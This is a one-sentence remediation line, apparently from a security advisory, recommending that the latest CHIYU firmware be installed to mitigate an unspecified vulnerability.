      The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.